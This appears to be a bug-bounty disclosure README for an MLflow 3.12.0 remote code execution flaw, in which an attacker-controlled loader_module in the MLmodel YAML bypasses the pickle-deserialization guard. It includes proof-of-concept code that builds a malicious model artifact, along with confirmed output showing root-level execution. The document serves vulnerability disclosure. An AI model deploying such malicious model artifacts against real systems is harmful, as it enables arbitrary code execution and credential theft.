MLflow F002 loader_module Guard Bypass RCE

Payload repository for Huntr / ProtectAI triage.

Finding

RCE: an unvalidated loader_module in the MLmodel YAML bypasses the MLFLOW_ALLOW_PICKLE_DESERIALIZATION guard in mlflow.pyfunc.load_model().

Primary PoC

proof_f002.py

Vulnerable Model Structure

The PoC creates a malicious MLflow model artifact with this structure:

evil_model/
  MLmodel
  code/
    evil_loader.py

The attacker-controlled MLmodel contains:

flavors:
  python_function:
    loader_module: evil_loader
    code: code

MLflow adds the model-controlled code/ directory to sys.path, then imports the attacker-controlled loader_module.
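The artifact layout above can be sketched as follows. This is an illustrative reconstruction, not proof_f002.py itself: the file and directory names follow the report, but the loader payload here only writes a harmless marker string instead of running the `id` command used by the actual proof.

```python
# Sketch of the malicious artifact layout described above (hypothetical
# reconstruction; the real PoC lives in proof_f002.py).
import os
import tempfile

MLMODEL = """\
flavors:
  python_function:
    loader_module: evil_loader
    code: code
"""

# The loader module's top-level code runs at import time; mlflow.pyfunc
# expects it to expose a _load_pyfunc() entry point.
EVIL_LOADER = """\
EXECUTED = "attacker code ran at import time"

def _load_pyfunc(path):
    return object()
"""

def build_evil_model(base_dir: str) -> str:
    """Write evil_model/{MLmodel, code/evil_loader.py} under base_dir."""
    model_dir = os.path.join(base_dir, "evil_model")
    os.makedirs(os.path.join(model_dir, "code"), exist_ok=True)
    with open(os.path.join(model_dir, "MLmodel"), "w") as f:
        f.write(MLMODEL)
    with open(os.path.join(model_dir, "code", "evil_loader.py"), "w") as f:
        f.write(EVIL_LOADER)
    return model_dir

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        path = build_evil_model(tmp)
        print(sorted(os.listdir(path)))  # ['MLmodel', 'code']
```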

Confirmed Behavior

The exploit was confirmed on MLflow 3.12.0.

The proof explicitly sets:

MLFLOW_ALLOW_PICKLE_DESERIALIZATION=False
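In Python terms the proof disables the guard via the environment before loading, along these lines (the actual load_model call is shown commented out, since it requires a vulnerable MLflow install and the malicious artifact):

```python
import os

# Disable pickle deserialization; per this report, the guard does not gate
# loader_module imports, so attacker code still executes on load.
os.environ["MLFLOW_ALLOW_PICKLE_DESERIALIZATION"] = "False"

# import mlflow.pyfunc
# model = mlflow.pyfunc.load_model("evil_model")  # attacker code runs here

print(os.environ["MLFLOW_ALLOW_PICKLE_DESERIALIZATION"])  # False
```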

Confirmed output includes:

UNIQUE_MARKER_F002_LOADER_MODULE_RCE
load_model_return_type: <class 'mlflow.pyfunc.PyFuncModel'>
marker_exists_after: True
marker_content: uid=0(root) gid=0(root) groups=0(root)
F002_CONFIRMED: loader_module imported attacker code while pickle guard was disabled

This confirms attacker-controlled Python code executed during mlflow.pyfunc.load_model() even though pickle deserialization was disabled.

Why This Is Not a Pickle Claim

This PoC does not require a malicious pickle payload.

The root cause is dynamic import of attacker-controlled module metadata:

python_function.loader_module

read from the attacker-controlled MLmodel YAML, after MLflow prepends the attacker-controlled model code directory to Python's import path.
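The vulnerable pattern can be demonstrated with the standard library alone, with no pickle involved: prepend an attacker-controlled directory to sys.path, then import a module whose name comes from attacker-controlled metadata. The module's top-level code runs at import time. The names below are illustrative, not MLflow internals.

```python
# Stdlib-only simulation of the dispatch pattern described above.
import importlib
import os
import sys
import tempfile

with tempfile.TemporaryDirectory() as code_dir:
    # Stand-ins for the model's code/ directory and the MLmodel-supplied name.
    loader_module = "evil_loader"
    with open(os.path.join(code_dir, loader_module + ".py"), "w") as f:
        f.write("EXECUTED = True\n")

    sys.path.insert(0, code_dir)  # analogous to honoring the `code:` entry
    try:
        # Analogous to resolving loader_module: top-level code runs here.
        mod = importlib.import_module(loader_module)
        print(mod.EXECUTED)  # True
    finally:
        sys.path.remove(code_dir)
```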

Key Evidence Files

proof_f002.py
RAW/proof_f002_stdout.txt
RAW/proof_f002_stderr.txt
RAW/proof_f002_exit_code.txt
SRC/source_references_f002.txt
SOURCE_REFERENCES.md
ENVIRONMENT.txt
COMMANDS.md
REQUESTS_RESPONSES.md
SHA256SUMS.txt

Scope

Confirmed against:

Repository: mlflow/mlflow
Version: MLflow 3.12.0
Component: mlflow.pyfunc.load_model()
Affected path: Python Function flavor loader dispatch
Security control bypassed: MLFLOW_ALLOW_PICKLE_DESERIALIZATION=False

Impact

An attacker who can cause a target to load an attacker-controlled MLflow model artifact can execute arbitrary Python code in the MLflow process context.

Potential impact includes:

environment variable theft
cloud credential theft
model artifact theft or tampering
CI/CD compromise
lateral movement from model validation or serving infrastructure

This repository intentionally contains only MLflow F002 loader_module guard-bypass RCE artifacts.